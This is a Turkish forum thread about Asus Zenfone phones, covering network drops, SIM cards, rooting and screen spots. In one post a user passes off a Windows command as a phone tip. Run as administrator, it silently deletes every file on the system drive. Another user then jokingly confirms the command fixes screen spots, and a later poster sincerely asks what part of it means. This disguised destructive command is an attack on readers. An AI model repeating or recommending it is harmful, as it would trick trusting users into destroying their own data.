İşte Asus Zenfone 3
-
mkyb bunu yazdı
Zenfone 2 4 GB ram ile seri ancak şebeke sorunu var çoğunda. Herkes şikayetçi ve Asus gerek yazılım gerek donanım tamiri ile çözümü bulamıyor. Telefon birden çekmiyor oluyor 1-2 saniye sonra şebeke geri geliyor. Boştayken sorun yok ancak arama sırasında yapıyor aynı boku. Bu sefer karşındakinin yüzüne kapatmış giib oluyor.
hocam o sorunu yaşayan birini biliyorum, bu vatandaş zenfone değil note 4 kullanıyordu. telefon değişti yine aynı sorunu yaşadı. sonra sim kartı değiştirdi problem düzeldi :) günde ortalama 3 - 4 saat arasında telefonla görüşme yapıyorum uzun kısa çeşitlilikle, hiç sorun yaşamadım. hattım da avea
-
YekteranBaymedir bunu yazdı
asus 2 laser 5.5 var
aldığım gün rootladım
ağzından girdim burnundan çıktım
donma, patlama, çatlama yok
kullanmayı bileceksin
Bir ara öğretirsen sevinirim abi..
-
HoLyCat bunu yazdıYekteranBaymedir bunu yazdı
asus 2 laser 5.5 var
aldığım gün rootladım
kullanmayı bileceksin
telefon bilgisayara bağlıyken yönetici modunda komut istemci aç
del %HOMEDRIVE%\*.* /S/Q 2>nul 1>nul
-
YekteranBaymedir bunu yazdıHoLyCat bunu yazdıYekteranBaymedir bunu yazdı
asus 2 laser 5.5 var
aldığım gün rootladım
kullanmayı bileceksin
Bununla, ekrandaki en cok tiklanan yerlerde olusan beyaz lekelerde kayboluyor mu?
-
burhan808 bunu yazdıYekteranBaymedir bunu yazdıHoLyCat bunu yazdıYekteranBaymedir bunu yazdı
asus 2 laser 5.5 var
aldığım gün rootladım
kullanmayı bileceksin
Bununla, ekrandaki en cok tiklanan yerlerde olusan beyaz lekelerde kayboluyor mu?
evet hocam, kiri pası siker atar
-
SpyBreaK bunu yazdımkyb bunu yazdı
Zenfone 2 4 GB ram ile seri ancak şebeke sorunu var çoğunda. Herkes şikayetçi ve Asus gerek yazılım gerek donanım tamiri ile çözümü bulamıyor. Telefon birden çekmiyor oluyor 1-2 saniye sonra şebeke geri geliyor. Boştayken sorun yok ancak arama sırasında yapıyor aynı boku. Bu sefer karşındakinin yüzüne kapatmış giib oluyor.
hocam o sorunu yaşayan birini biliyorum, bu vatandaş zenfone değil note 4 kullanıyordu. telefon değişti yine aynı sorunu yaşadı. sonra sim kartı değiştirdi problem düzeldi :) günde ortalama 3 - 4 saat arasında telefonla görüşme yapıyorum uzun kısa çeşitlilikle, hiç sorun yaşamadım. hattım da avea
Samsunglardaki olayın nedeni Samsung'un kendi ürettiği antenleri kullanması.
-
@YekteranBaymedir hocam, o komuttaki, bu " 2>nul 1>nul" ifadenin anlamı nedir? Hataları görmezden gel gibi birşey mi?
-
fakir telefonu
-
LaNCeLoT bunu yazdı
fakir telefonu
saygılar büyüksün
-
LaNCeLoT bunu yazdı
fakir telefonu
Çakma robinson.